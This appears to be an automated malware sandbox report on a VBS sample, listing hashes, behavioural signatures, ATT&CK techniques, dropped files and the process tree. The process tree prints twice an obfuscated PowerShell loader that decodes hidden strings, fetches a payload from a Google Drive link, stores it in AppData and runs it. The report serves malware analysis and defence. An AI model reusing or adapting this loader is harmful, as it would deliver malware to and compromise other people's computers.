67fbf9f34cf2fa287ef78230cfcaacfcf150238e526341bbaa4cbb86d7382c58

General

Target

67fbf9f34cf2fa287ef78230cfcaacfcf150238e526341bbaa4cbb86d7382c58.vbs
Size

361KB
MD5

fe62c58bcc975e7ebbd268b44a518785
SHA1

696f215f0abe6f1513ddd0a6e8235d99fa5da7fe
SHA256

67fbf9f34cf2fa287ef78230cfcaacfcf150238e526341bbaa4cbb86d7382c58
SHA512

5d70692b8c4b95c61d08c07b1eff6d98ebf58692a10af71281a1fba06a94cb25102803bf1776a5546798427b7a4a76bf62bd3538ed7e7a063f27326df484cc80
SSDEEP

6144:6Q1LaVfs2VTA05zBWJKJqDv9WlmDg6bMiaNb3rczF9V4I5Btg/zRoFTC4vSUUkP/:bKInOiANKdGs

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

WScript.exepowershell.exe

flow pid process

4 4836 WScript.exe
11 4300 powershell.exe
17 4300 powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

WScript.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation WScript.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

10 drive.google.com
11 drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

4432 2556 WerFault.exe powershell.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid process

4300 powershell.exe
4300 powershell.exe
2556 powershell.exe
2556 powershell.exe
2556 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 4300 powershell.exe
Token: SeDebugPrivilege 2556 powershell.exe

flow	pid	process
4	4836	WScript.exe
11	4300	powershell.exe
17	4300	powershell.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2177723727-746291240-1644359950-1000\Control Panel\International\Geo\Nation	WScript.exe

flow	ioc
10	drive.google.com
11	drive.google.com

pid	pid_target	process	target process
4432	2556	WerFault.exe	powershell.exe

pid	process
4300	powershell.exe
4300	powershell.exe
2556	powershell.exe
2556	powershell.exe
2556	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4300	powershell.exe
Token: SeDebugPrivilege	2556	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 4836 wrote to memory of 4300	4836	WScript.exe	powershell.exe
PID 4836 wrote to memory of 4300	4836	WScript.exe	powershell.exe
PID 4300 wrote to memory of 2460	4300	powershell.exe	cmd.exe
PID 4300 wrote to memory of 2460	4300	powershell.exe	cmd.exe
PID 4300 wrote to memory of 2556	4300	powershell.exe	powershell.exe
PID 4300 wrote to memory of 2556	4300	powershell.exe	powershell.exe
PID 4300 wrote to memory of 2556	4300	powershell.exe	powershell.exe
PID 2556 wrote to memory of 4000	2556	powershell.exe	cmd.exe
PID 2556 wrote to memory of 4000	2556	powershell.exe	cmd.exe
PID 2556 wrote to memory of 4000	2556	powershell.exe	cmd.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\67fbf9f34cf2fa287ef78230cfcaacfcf150238e526341bbaa4cbb86d7382c58.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4836

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Klassicismen = 1;$Noncircularly='Substrin';$Noncircularly+='g';Function Babysitternes($Hematoglobulin){$Phenylated=$Hematoglobulin.Length-$Klassicismen;For($Arbejdsmnstrene=7; $Arbejdsmnstrene -lt $Phenylated; $Arbejdsmnstrene+=(8)){$Stormangrebenes+=$Hematoglobulin.$Noncircularly.Invoke($Arbejdsmnstrene, $Klassicismen);}$Stormangrebenes;}function Azafrin($Englersts){. ($Quadrivalent34) ($Englersts);}$Pullen=Babysitternes 'sisyrinMVelkomsoMonocotzUnrotati Ir,elilAlmann lPunnagea piller/Demure 5Relickt. rbejds0Kabines dishea(backresWOffentliKu.egranSul,onadQuellsaopie.ngfwBallyhosbeleapb T.lypeNVelouteTS bbata .aanopt1Pla les0hekseja.Transpi0 yrepen;Vindert s,umberWSubjekti Ldrep,n E,itra6Courget4 I exci;Velbeha BruttolxHe temo6Paviera4buckaro;Hjernet S.attepr,nregisvC,attan:Ar.ejds1Clumped2Inarabl1Delin u.Cuspida0Discons)Mislear ForstraG Bade,ne DatalocAnnoterkBostonsoFrdighe/ S idsa2Snittet0Prototy1Nonpope0c,mbris0Tatsma 1N.diest0 teddtr1,ilrett .nfernoFRabbleriTartnesrmugwu,pe Ratab.fskodderoNotat.oxm,ljmyn/Inkorpo1Spacing2Yrthtaf1Vedtgte.S,eiken0Populrv ';$Acanthocephalous=Babysitternes ' PladerUAndelshsAfbaarneIncorporDavosur-T.uebreAVildledgDis,elieHoneyben Satellt ebili ';$Attributionernes=Babysitternes 'Myristahtactilot Ro.ndit,ncapitpSkumme s Orkidj:precalc/Tilgiv./ PengeldSmoothnr S.oaliiLapningvHusbo.deGld,str.ReechoegSte peuoAwa,tinoDilet.agRammermlUncrysteUdelika. P,ocescAkamaiso CyklermHand,ne/KalaseruInform,c Hyper ?Filmedee Allochx MonolapMusedeaometaph,rFrkenklt .rbukk=Cru.ntadOpspoleo Titterwautoki,nSololielbronki,oPsykopaa KummerdEnemrke&Frilag.iDunkedndMandato=Primfak1Opsang IForesp pSkaane mVin.erv2inse.taOVognesnh LetsvrZNightinNOpraabeM Ep.istX.uborditSkylineKPse dodULyserde8 undstt9eurypteC Em,ratu Art.riJHogmaneMKonomikDkattep -RaacremIGenaabneNeophilW,tradamB SmandsrDataopsHL.jekasIRecu edG,ffounf2 Grossmt BejdseAStrandh ';$Unfitness=Babysitternes 'Kyperta>Hjaltef ';$Quadrivalent34=Babysitternes 'filantri Inh,rieU,aalmoxV lylhy ';$Fiskerjoller = Babysitternes 'PusscateAc,tophcMoralizhUnderdooTidsdel Miskr d%Refere aCircadip Indskyp Mileagd EtplanaRavenfot BirkesaXenopla%Offentl\S adigsPSet,ereaImmov,apVkstpros revers.UdpreskT Filtreh Knoldbi Religi Thyroi&Halva,s&Wellma. Subterre Selvr c HydroxhMeskedsoPrudent Acr par$Preac.u ';Azafrin (Babysitternes 'Natugle$UnstealgAabninglTelemesofaxnummb KummeraDiagrapl Kar.ot:OestrussCaffeicuSkaanevb Bowdlefhjer.esu Tabli.s F,aadeiInkraunf Partsho crouthrOverdremDisinte=Koin id( DepuracBibliopm Ribaldd Krybek Heptasp/Int,gracOutrage Reiniti$SelvbygF,ntrodui ,ynnedsSvejtsekuddrivee sashayrPhy.icijBluse,doKvkkerbl Afte hlFli.keteNom,nalrHandels) Sk,lle ');Azafrin (Babysitternes '.ambukt$EffektvgFremdatlslutsedoWaybungbDragglyaFlaade,lRe.ativ:HeteronSLaramieiNothingg Iodizal Gl,oxiu SkolebmInterpo=Initiat$ AtrofiA KonkurtCyanogetPenetrartraadspiFjllevobHundehauLaksf,rtDyrkelii Interpo zerlinnCalorite Barba rLevenden debatoeRejselosKommuni.Ta ulers.oldenlpVirificlSuppliaiUnmeanitlammegr(Jordane$Def,edaUD,stancnPlanlgnf Met oriunquesttSkiltesntyls.joeTredivts entalksLactifi) Dyeh,u ');$Attributionernes=$Siglum[0];Azafrin (Babysitternes 'Engross$.rdimnggPiperinlSnesireo Subterb ReallnaRumstatlDragone: SurmlkHBryologybulkerppFro.nydoCholutep,ipalukhKorrespyCockadesNdhjlpsiexcerptcFedtstosCawkykl= BilledNStr,knte.dearbewT nkren-tenderiO ReassebEchellejEngdrageRatitoucMa.riklt Co.gre JuiceliSJr.asheyKis,lals MyntentBlyantseU spreamTurfove.Af sethNUnlooteeFldechot.issoci. Sk.iveWA,abasteNo joinbSiversaCBertinalPlatituiRa idese jumredn FormaltClangfu ');Azafrin (Babysitternes 'Chemica$PeesoreHOpdagely Missu pPol.andoPrkendepEndomithSelvhj,yorotundsSvinepeiRaspatocB.chamesPygmoi.. Over iHOpholdse PejlevaPreeditdBarn faeGr.zetdrTherm,rs Parkye[Betinge$TrolleyANano.epcRepriseaAlkoholnKist aetSe sendhMelonlioLinguiscPurivsieD aheliptilstanhDomsforaRevolutlFalsedeoGrenerbuBegyndes Medarb]Substoc=Earnedo$NedvurdPcolibakuLactosil BlandilMonologe Ud.asknSpejlgl ');$Gneissitic=Babysitternes 'SkjorteHpre toty,dspilepVirksomoTh.rmospReoblighVildledy LsningsBilledri Fredelc Ka tevsUngust..Udsk.llDHemiphroSamaritw F,organOffsettlgrossisoHofleveaBenva md,uddlesF Gabb niCikori l HjemseeF.erska(Fuldrig$HarmoniASlfangstDunamsot Verdenrovispe.i ,ygomabMartinguParast,tStoppabiko,mandoTrafikknRecipieeKartoterMaterianUforstye LettelsMag eti,sgeproc$ Le puaRUnlet aeGglend,fProductlgnaver.e Sygh,bkCptst.utDictogrosystempr ravaiiCurebrns Ak,taskTrktjer)D.bacle ';$Gneissitic=$subfusiform[1]+$Gneissitic;$Reflektorisk=$subfusiform[0];Azafrin (Babysitternes ' Svimes$Aftes eg Car,onlTrispi.oOpremsebUndernoaIodisedlMilieut: isorgaC swanmaeRestimurIndhegnr BakteriUn.rotea .oserilBelittl=Afstu.k(PylrescTP ehisteLok enestidsbuntHypothe- FragraPVldendeawiredratKind eshFranskg Te egr$Halv.emRStockmaeUpbubblfDramatilFllesineElectrokValsesptHebdomao supercrStudiesiRettidisw hcondk Supran),ehandl ');while (!$Cerrial) {Azafrin (Babysitternes 'Heartfu$Laese,rgAfpoli l K,rkemoBarbaribBriefetaFingerslReddcur:SermoniDCounteriTa.sfoevIndtr ei AutoplsZ.buerni Folkeso KlittenConfinea OutwailNoncret=Thermos$RaasafttHaglskarUsablevuBrugs,ee Nilosc ') ;Azafrin $Gneissitic;Azafrin (Babysitternes 'CallosiSIn enirtRadikalaJalopherDriftsltRedis e-S bsidiSHidfrtilUnadvereAdenocheProgrampDicotsh Skoleka4Sylvati ');Azafrin (Babysitternes 'Nav.sgr$Underdig BodybulPeri sto OvervrbOverdosasacramelSml.des:MyocoelCSub,onseOuts agr Hek,errind katiRi.sulea Low,lylal.mnat=Subtrah(I tersuTtollgate Cent,rs TympantHa.flin- Svag lPGeneralabygningtDisciplh.uzzles Ch.rrin$RefundeRdecameteAutoettf erfectlDroscheeRustninkKimmbestSurmateoRolloutrDekaedriWhigga sdopingbk Modist)Werelio ') ;Azafrin (Babysitternes 'ihndeha$Mesofurg Kol,holSpacedioJordlovbNorthinaphenazil .itsub:YndighesKompl mpTidersaiPythicbcwincheroUdstderuAuteurisA,tenat=,ideoku$Cast.ingB,mbaxol Tilsanobrolggeb Over.iaPlaintflSpiller:.dsynetA UndersfAnutramfFedtvvslOffici,iexce.lic HelsebtOc,ansiiBurstern Afr gngCommoda+Efterha+ Kir.pr%Blomste$HoldninSDesec.aicremefrgOmstilslAscribauBan.yatmEpil.pt. Apt.rycNonviscoRealkapu MiljbenArgumentUsikrer ') ;$Attributionernes=$Siglum[$spicous];}Azafrin (Babysitternes 'Kattyla$Betali g Raftehl Ogdoadourvrke.b.debadeaPa,ificl Unmapp:MinimerISolido,n Forb,hkTarge,lbConstatlRaabaanoSammenktFodspor Whirtle=paatryk m nhirdGPristaleRou hnetkunstpr-TramaanCAttenhuoaudi,esnurochrotArbejdse Lak rrnHysterotSkummet Unstret$B ocardRtyndsteeAutobiofBit.erbl.atriareSgeteknk Ubevg tTredobloPenlit rSup rini Selme,s DagsakkUnplea ');Azafrin (Babysitternes 'Trykker$HistorigArabicil,tuddieoUnintelbHylozoiaSodapaslUpartis:JalousiVStraaliaOverapplre aliduFortoldtB,rnupuaFreda ehKlovspiaCorpmiln Uanfgtd Bjergkl Su ficepis antrStentjseIn,lemm Klendus= hrist Caschro[Gte,usnSHvedsm.ybjlkehusIgnorestUds nineOrometrmdepeche. CoplioCRekordwoInitialnRattenevBabass.eK.mediar ejlradtFrankos]Cocaino: Prakti:UnslimlFSa,skrerNone.tioWarrantm TidskrBVagtfunaCopromosGimmerlePolitia6 Vrleta4 PreintSManroottBeltlesrsephardiUnchaffnMahognig Troshu(Pickede$ AnglewI ,entydnAnthobikMon.menbControvlUp,estuo TalenttSjofelh)Ditetis ');Azafrin (Babysitternes 'ko.lekt$Quinoxag SammenlPlanndroForsidebUnbeli.aRyanpeplNonopin:SpatangRC.smopoePizzskod bassalaFjerbusrChall ng Aaremau.tukloftArrest,iKl ngbjoRatanienAfsk.iv Domorga=Thomssq Julenis[TripalmSF,rtykky CassinsEgmundst Optnkee PrecaumP,ovins. TitivaTadelsskeSuperobxAlcoholtConemak.PrioritE .nthypnAnstndicPrioritoLupe cad U.bydeiBakallonPharma,gTurov,e].ummerl:Capac t:MaksimaASummatiSUdmatriCTvangsaISlotsprIMarione.ReportaGImbecile ostioltD skoenS Etiksht Daed,lrNi,buspi cogno nSl gtemg kalles(Upaed g$Disma eVFiord,uaVask,malSemiolouDe ervitS.mpatiaSkilbenh.trippeaDagpaafnPinnatedbetydnilTakhaa.e,nmrkerr LsefereFremm d) onvic ');Azafrin (Babysitternes ' U.deli$Interp.gOvergeslI pregaoWartlikbContracaKongruelF.rsoni:PhototoHAlsidige ElektrdNoncol.eAnticon2 Dom ni1Skingre7Sv vgts=Antepil$SpisekrROn ulereKorrespdprak.isaFejlstrrInfo,magWorshipuSpecialtInte.esiPaaholdo NayaronUdvikli.UncollesSvedereuMessehabAktiegesClockcatKlin rerDesertriLikrernnhorraybg Pitfal(Systema3Tempere1Troldkl9Tinghus1Apla.ab5Konge,r2Abnorm , Unac.i2Paatnkt9 Resp k4Dob,elt1Hydrodi2 C.shea)Nonprot ');Azafrin $Hede217;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4300

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Paps.Thi && echo $"
3⤵
PID:2460

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Klassicismen = 1;$Noncircularly='Substrin';$Noncircularly+='g';Function Babysitternes($Hematoglobulin){$Phenylated=$Hematoglobulin.Length-$Klassicismen;For($Arbejdsmnstrene=7; $Arbejdsmnstrene -lt $Phenylated; $Arbejdsmnstrene+=(8)){$Stormangrebenes+=$Hematoglobulin.$Noncircularly.Invoke($Arbejdsmnstrene, $Klassicismen);}$Stormangrebenes;}function Azafrin($Englersts){. ($Quadrivalent34) ($Englersts);}$Pullen=Babysitternes 'sisyrinMVelkomsoMonocotzUnrotati Ir,elilAlmann lPunnagea piller/Demure 5Relickt. rbejds0Kabines dishea(backresWOffentliKu.egranSul,onadQuellsaopie.ngfwBallyhosbeleapb T.lypeNVelouteTS bbata .aanopt1Pla les0hekseja.Transpi0 yrepen;Vindert s,umberWSubjekti Ldrep,n E,itra6Courget4 I exci;Velbeha BruttolxHe temo6Paviera4buckaro;Hjernet S.attepr,nregisvC,attan:Ar.ejds1Clumped2Inarabl1Delin u.Cuspida0Discons)Mislear ForstraG Bade,ne DatalocAnnoterkBostonsoFrdighe/ S idsa2Snittet0Prototy1Nonpope0c,mbris0Tatsma 1N.diest0 teddtr1,ilrett .nfernoFRabbleriTartnesrmugwu,pe Ratab.fskodderoNotat.oxm,ljmyn/Inkorpo1Spacing2Yrthtaf1Vedtgte.S,eiken0Populrv ';$Acanthocephalous=Babysitternes ' PladerUAndelshsAfbaarneIncorporDavosur-T.uebreAVildledgDis,elieHoneyben Satellt ebili ';$Attributionernes=Babysitternes 'Myristahtactilot Ro.ndit,ncapitpSkumme s Orkidj:precalc/Tilgiv./ PengeldSmoothnr S.oaliiLapningvHusbo.deGld,str.ReechoegSte peuoAwa,tinoDilet.agRammermlUncrysteUdelika. P,ocescAkamaiso CyklermHand,ne/KalaseruInform,c Hyper ?Filmedee Allochx MonolapMusedeaometaph,rFrkenklt .rbukk=Cru.ntadOpspoleo Titterwautoki,nSololielbronki,oPsykopaa KummerdEnemrke&Frilag.iDunkedndMandato=Primfak1Opsang IForesp pSkaane mVin.erv2inse.taOVognesnh LetsvrZNightinNOpraabeM Ep.istX.uborditSkylineKPse dodULyserde8 undstt9eurypteC Em,ratu Art.riJHogmaneMKonomikDkattep -RaacremIGenaabneNeophilW,tradamB SmandsrDataopsHL.jekasIRecu edG,ffounf2 Grossmt BejdseAStrandh ';$Unfitness=Babysitternes 'Kyperta>Hjaltef ';$Quadrivalent34=Babysitternes 'filantri Inh,rieU,aalmoxV lylhy ';$Fiskerjoller = Babysitternes 'PusscateAc,tophcMoralizhUnderdooTidsdel Miskr d%Refere aCircadip Indskyp Mileagd EtplanaRavenfot BirkesaXenopla%Offentl\S adigsPSet,ereaImmov,apVkstpros revers.UdpreskT Filtreh Knoldbi Religi Thyroi&Halva,s&Wellma. Subterre Selvr c HydroxhMeskedsoPrudent Acr par$Preac.u ';Azafrin (Babysitternes 'Natugle$UnstealgAabninglTelemesofaxnummb KummeraDiagrapl Kar.ot:OestrussCaffeicuSkaanevb Bowdlefhjer.esu Tabli.s F,aadeiInkraunf Partsho crouthrOverdremDisinte=Koin id( DepuracBibliopm Ribaldd Krybek Heptasp/Int,gracOutrage Reiniti$SelvbygF,ntrodui ,ynnedsSvejtsekuddrivee sashayrPhy.icijBluse,doKvkkerbl Afte hlFli.keteNom,nalrHandels) Sk,lle ');Azafrin (Babysitternes '.ambukt$EffektvgFremdatlslutsedoWaybungbDragglyaFlaade,lRe.ativ:HeteronSLaramieiNothingg Iodizal Gl,oxiu SkolebmInterpo=Initiat$ AtrofiA KonkurtCyanogetPenetrartraadspiFjllevobHundehauLaksf,rtDyrkelii Interpo zerlinnCalorite Barba rLevenden debatoeRejselosKommuni.Ta ulers.oldenlpVirificlSuppliaiUnmeanitlammegr(Jordane$Def,edaUD,stancnPlanlgnf Met oriunquesttSkiltesntyls.joeTredivts entalksLactifi) Dyeh,u ');$Attributionernes=$Siglum[0];Azafrin (Babysitternes 'Engross$.rdimnggPiperinlSnesireo Subterb ReallnaRumstatlDragone: SurmlkHBryologybulkerppFro.nydoCholutep,ipalukhKorrespyCockadesNdhjlpsiexcerptcFedtstosCawkykl= BilledNStr,knte.dearbewT nkren-tenderiO ReassebEchellejEngdrageRatitoucMa.riklt Co.gre JuiceliSJr.asheyKis,lals MyntentBlyantseU spreamTurfove.Af sethNUnlooteeFldechot.issoci. Sk.iveWA,abasteNo joinbSiversaCBertinalPlatituiRa idese jumredn FormaltClangfu ');Azafrin (Babysitternes 'Chemica$PeesoreHOpdagely Missu pPol.andoPrkendepEndomithSelvhj,yorotundsSvinepeiRaspatocB.chamesPygmoi.. Over iHOpholdse PejlevaPreeditdBarn faeGr.zetdrTherm,rs Parkye[Betinge$TrolleyANano.epcRepriseaAlkoholnKist aetSe sendhMelonlioLinguiscPurivsieD aheliptilstanhDomsforaRevolutlFalsedeoGrenerbuBegyndes Medarb]Substoc=Earnedo$NedvurdPcolibakuLactosil BlandilMonologe Ud.asknSpejlgl ');$Gneissitic=Babysitternes 'SkjorteHpre toty,dspilepVirksomoTh.rmospReoblighVildledy LsningsBilledri Fredelc Ka tevsUngust..Udsk.llDHemiphroSamaritw F,organOffsettlgrossisoHofleveaBenva md,uddlesF Gabb niCikori l HjemseeF.erska(Fuldrig$HarmoniASlfangstDunamsot Verdenrovispe.i ,ygomabMartinguParast,tStoppabiko,mandoTrafikknRecipieeKartoterMaterianUforstye LettelsMag eti,sgeproc$ Le puaRUnlet aeGglend,fProductlgnaver.e Sygh,bkCptst.utDictogrosystempr ravaiiCurebrns Ak,taskTrktjer)D.bacle ';$Gneissitic=$subfusiform[1]+$Gneissitic;$Reflektorisk=$subfusiform[0];Azafrin (Babysitternes ' Svimes$Aftes eg Car,onlTrispi.oOpremsebUndernoaIodisedlMilieut: isorgaC swanmaeRestimurIndhegnr BakteriUn.rotea .oserilBelittl=Afstu.k(PylrescTP ehisteLok enestidsbuntHypothe- FragraPVldendeawiredratKind eshFranskg Te egr$Halv.emRStockmaeUpbubblfDramatilFllesineElectrokValsesptHebdomao supercrStudiesiRettidisw hcondk Supran),ehandl ');while (!$Cerrial) {Azafrin (Babysitternes 'Heartfu$Laese,rgAfpoli l K,rkemoBarbaribBriefetaFingerslReddcur:SermoniDCounteriTa.sfoevIndtr ei AutoplsZ.buerni Folkeso KlittenConfinea OutwailNoncret=Thermos$RaasafttHaglskarUsablevuBrugs,ee Nilosc ') ;Azafrin $Gneissitic;Azafrin (Babysitternes 'CallosiSIn enirtRadikalaJalopherDriftsltRedis e-S bsidiSHidfrtilUnadvereAdenocheProgrampDicotsh Skoleka4Sylvati ');Azafrin (Babysitternes 'Nav.sgr$Underdig BodybulPeri sto OvervrbOverdosasacramelSml.des:MyocoelCSub,onseOuts agr Hek,errind katiRi.sulea Low,lylal.mnat=Subtrah(I tersuTtollgate Cent,rs TympantHa.flin- Svag lPGeneralabygningtDisciplh.uzzles Ch.rrin$RefundeRdecameteAutoettf erfectlDroscheeRustninkKimmbestSurmateoRolloutrDekaedriWhigga sdopingbk Modist)Werelio ') ;Azafrin (Babysitternes 'ihndeha$Mesofurg Kol,holSpacedioJordlovbNorthinaphenazil .itsub:YndighesKompl mpTidersaiPythicbcwincheroUdstderuAuteurisA,tenat=,ideoku$Cast.ingB,mbaxol Tilsanobrolggeb Over.iaPlaintflSpiller:.dsynetA UndersfAnutramfFedtvvslOffici,iexce.lic HelsebtOc,ansiiBurstern Afr gngCommoda+Efterha+ Kir.pr%Blomste$HoldninSDesec.aicremefrgOmstilslAscribauBan.yatmEpil.pt. Apt.rycNonviscoRealkapu MiljbenArgumentUsikrer ') ;$Attributionernes=$Siglum[$spicous];}Azafrin (Babysitternes 'Kattyla$Betali g Raftehl Ogdoadourvrke.b.debadeaPa,ificl Unmapp:MinimerISolido,n Forb,hkTarge,lbConstatlRaabaanoSammenktFodspor Whirtle=paatryk m nhirdGPristaleRou hnetkunstpr-TramaanCAttenhuoaudi,esnurochrotArbejdse Lak rrnHysterotSkummet Unstret$B ocardRtyndsteeAutobiofBit.erbl.atriareSgeteknk Ubevg tTredobloPenlit rSup rini Selme,s DagsakkUnplea ');Azafrin (Babysitternes 'Trykker$HistorigArabicil,tuddieoUnintelbHylozoiaSodapaslUpartis:JalousiVStraaliaOverapplre aliduFortoldtB,rnupuaFreda ehKlovspiaCorpmiln Uanfgtd Bjergkl Su ficepis antrStentjseIn,lemm Klendus= hrist Caschro[Gte,usnSHvedsm.ybjlkehusIgnorestUds nineOrometrmdepeche. CoplioCRekordwoInitialnRattenevBabass.eK.mediar ejlradtFrankos]Cocaino: Prakti:UnslimlFSa,skrerNone.tioWarrantm TidskrBVagtfunaCopromosGimmerlePolitia6 Vrleta4 PreintSManroottBeltlesrsephardiUnchaffnMahognig Troshu(Pickede$ AnglewI ,entydnAnthobikMon.menbControvlUp,estuo TalenttSjofelh)Ditetis ');Azafrin (Babysitternes 'ko.lekt$Quinoxag SammenlPlanndroForsidebUnbeli.aRyanpeplNonopin:SpatangRC.smopoePizzskod bassalaFjerbusrChall ng Aaremau.tukloftArrest,iKl ngbjoRatanienAfsk.iv Domorga=Thomssq Julenis[TripalmSF,rtykky CassinsEgmundst Optnkee PrecaumP,ovins. TitivaTadelsskeSuperobxAlcoholtConemak.PrioritE .nthypnAnstndicPrioritoLupe cad U.bydeiBakallonPharma,gTurov,e].ummerl:Capac t:MaksimaASummatiSUdmatriCTvangsaISlotsprIMarione.ReportaGImbecile ostioltD skoenS Etiksht Daed,lrNi,buspi cogno nSl gtemg kalles(Upaed g$Disma eVFiord,uaVask,malSemiolouDe ervitS.mpatiaSkilbenh.trippeaDagpaafnPinnatedbetydnilTakhaa.e,nmrkerr LsefereFremm d) onvic ');Azafrin (Babysitternes ' U.deli$Interp.gOvergeslI pregaoWartlikbContracaKongruelF.rsoni:PhototoHAlsidige ElektrdNoncol.eAnticon2 Dom ni1Skingre7Sv vgts=Antepil$SpisekrROn ulereKorrespdprak.isaFejlstrrInfo,magWorshipuSpecialtInte.esiPaaholdo NayaronUdvikli.UncollesSvedereuMessehabAktiegesClockcatKlin rerDesertriLikrernnhorraybg Pitfal(Systema3Tempere1Troldkl9Tinghus1Apla.ab5Konge,r2Abnorm , Unac.i2Paatnkt9 Resp k4Dob,elt1Hydrodi2 C.shea)Nonprot ');Azafrin $Hede217;"
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2556

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Paps.Thi && echo $"
4⤵
PID:4000

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2556 -s 2364
4⤵
- Program crash
PID:4432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 2556 -ip 2556
1⤵
PID:3860

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

1

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Delphine.txt
Filesize
6KB

MD5
7fa7fa7f4edf3d480c26ca034e64de28

SHA1
3de201a86fe6cc0f299a1f50e0ba5c9c9c272337

SHA256
807f3b224186f17fc459c3383d44a6f3e2d8aa8e9ca5c9f0e0ac5043d3d23862

SHA512
848de6d4ba56dc37dd279a2890b210a7fd4e14f855d5c05d2c2ab0f08a10536b878d330a2797056c3569a98a1f663bec10e32602fb6ac524c7bb4c4e43ce4371

Download Submit
C:\Users\Admin\AppData\Local\Temp\Delphine.txt
Filesize
745B

MD5
75132c80da9449c6195bc5c2d7e8c211

SHA1
9d58d6704011ed8db663fc74eada96a9c128426c

SHA256
bec6e1e263986408b7d5ba05adc310056c52db9754ece94aa219453973f48af2

SHA512
7c892094a78144fae431e4ff3372370693e38efaec4ed89f179cd90af16c0e002c180fcaa93de25a7ca269c2b96274c0ca94be3590fb3e2e99a71080fafcf487

Download Submit
C:\Users\Admin\AppData\Local\Temp\Delphine.txt
Filesize
2KB

MD5
ea8e61704251a91d3a0b3a43ebe55133

SHA1
a305207db7c88aac9776199c80803605e40d5b88

SHA256
3e04180d3d2b24cd64630ab512f497ed11a52007c3ea191626e6fa4dd384f934

SHA512
7a3e023f5b790a546945924c1db8aca638a80ad21bdc522738aff5cdff95b3b1de425e3d64dd9eb89eb9b3aa794b3798c6f4472fbfa57e96f3172294143362b3

Download Submit
C:\Users\Admin\AppData\Local\Temp\Delphine.txt
Filesize
2KB

MD5
54bc91290d92f66bbffff5e6689e8db5

SHA1
0b4ac5e01c85e1dc46bb84d201e0d4998e698cae

SHA256
9a4f6964868199b009d1b3ed1b09da3588473bc28ae68395d3695e47ad283c7c

SHA512
7760897cd91d98e668a2a92fc2ed4674bb3a5bf5a0d93c54678db84ce6ce207f54aad3b8938b609a79a3ad888f4721d4440c49d9b6c5d8b0e524e484be79cfc5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Delphine.txt
Filesize
5KB

MD5
19aff12409a9ac57a2db99a9b3227799

SHA1
06930134df04883f211631e3ddff6dbc70c14ac0

SHA256
30ed1a61a2b038ec5089ef1b2677d65204be50bb5d738bb5aa0fa08aab6126be

SHA512
96d476b4d294782a3b9f2c5e154aa19a854eacda0aaabdbf3aad70728b69ce96e86172ea6654e179b802e9e25666999d3a42bdc9bc745d2f1f6cc9f1877c0f37

Download Submit
C:\Users\Admin\AppData\Local\Temp\Delphine.txt
Filesize
502B

MD5
ab241a8587005b5234626aeb70a26c01

SHA1
53eb83c14c00ee7820d6e9cac6499de0576dc8b6

SHA256
8a279886467ec89e3a99d0a7ab2271731cef930ee9b8a2677ed73d407fb5711a

SHA512
3f7ae839824e78219a5d647f62ae7847798057e7b6aa3c6d01e99f51b8eb7321b89636b3343ef2526f0b4755ebed4b32ac0fd4adcceb8f1c8580e2c4f8882723

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_az1xbhh0.rwv.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Paps.Thi
Filesize
453KB

MD5
62a2406a56d4b84b4baad2d1c1a7479a

SHA1
2c08075d427f4ceba89260ef86e4469df1b5d398

SHA256
0239013ba33c599fcde5d5da6d6c31d9dd480871312edc0cafb840045da598e6

SHA512
01deccd705b9f4f5baa720c0646e1a09624fd7eb4db6ee716792ecf80c00c585a23a06ff0964bb09742f3716b5863c0c7160af7e1a9636feabcc2575d4c8a8ff

Download Submit
